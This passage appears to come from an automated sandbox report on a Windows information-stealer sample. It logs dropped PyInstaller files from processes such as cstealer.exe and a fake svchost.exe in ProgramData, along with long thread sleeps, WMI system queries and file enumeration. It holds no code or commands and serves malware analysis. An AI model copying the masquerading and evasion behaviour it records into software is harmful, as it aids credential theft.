                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_brotli.cp310-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\python310.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_sqlite3.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-17454
                                Source: C:\Windows\System32\cmd.exeAPI coverage: 7.1 %
                                Source: C:\Users\user\AppData\Local\Temp\main.exeAPI coverage: 2.2 %
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeAPI coverage: 2.7 %
                                Source: C:\Users\user\Desktop\DevxExecutor.exe TID: 616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\cmd.exe TID: 8100Thread sleep count: 10000 > 30Jump to behavior
                                Source: C:\Windows\System32\cmd.exe TID: 8100Thread sleep time: -10000000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 9088Thread sleep count: 10000 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 9088Thread sleep time: -10000000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8060Thread sleep count: 9998 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8060Thread sleep time: -9998000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep count: 3795 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 4346 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 91 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 3903 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 121 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 8152Thread sleep count: 9553 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 8152Thread sleep time: -9553000s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 8152Thread sleep count: 445 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 8152Thread sleep time: -445000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 6584Thread sleep count: 9998 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 6584Thread sleep time: -9998000s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -5534023222112862s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -600000s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8476Thread sleep count: 2320 > 30
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599812s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599656s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599433s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599323s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599094s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598930s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598806s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598693s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598544s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598437s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598317s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598187s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -598035s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -597906s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -597716s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -597569s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -597453s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -597310s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -597109s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -596890s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -596680s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -596493s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -596344s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -596203s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -596056s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -595927s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -595778s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -595604s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -595216s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -595061s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -594937s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8188Thread sleep time: -30000s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8084Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 3168Thread sleep count: 9998 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 3168Thread sleep time: -9998000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep count: 941 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\svchost.exe TID: 8156Thread sleep count: 9998 > 30
                                Source: C:\ProgramData\svchost.exe TID: 8156Thread sleep time: -9998000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep count: 8785 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep count: 412 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432Thread sleep count: 9616 > 30
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432Thread sleep time: -9616000s >= -30000s
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432Thread sleep count: 381 > 30
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432Thread sleep time: -381000s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 6120Thread sleep count: 9999 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 6120Thread sleep time: -9999000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8348Thread sleep count: 9999 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8348Thread sleep time: -9999000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8896Thread sleep count: 2956 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9100Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8884Thread sleep count: 231 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\svchost.exe TID: 7556Thread sleep count: 9991 > 30
                                Source: C:\ProgramData\svchost.exe TID: 7556Thread sleep time: -9991000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8520Thread sleep count: 8787 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8520Thread sleep time: -8787000s >= -30000s
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\ProgramData\main.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC67DCE0 FindFirstFileExW,3_2_00000271DC67DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E8D00 FindFirstFileExW,FindClose,3_2_00007FF6957E8D00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958026C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF6958026C4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,3_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,3_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,4_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E98D00 FindFirstFileExW,FindClose,4_2_00007FF6D6E98D00
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,4_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF6D6EB26C4
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D921DCE0 FindFirstFileExW,5_2_00000230D921DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128DCE0 FindFirstFileExW,7_2_0000014E7128DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,9_2_00007FF8A8033229
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FF8D0 GetSystemInfo,3_2_00007FF8A48FF8D0
                                Source: C:\Users\user\Desktop\DevxExecutor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 600000
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599812
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599656
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599433
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599323
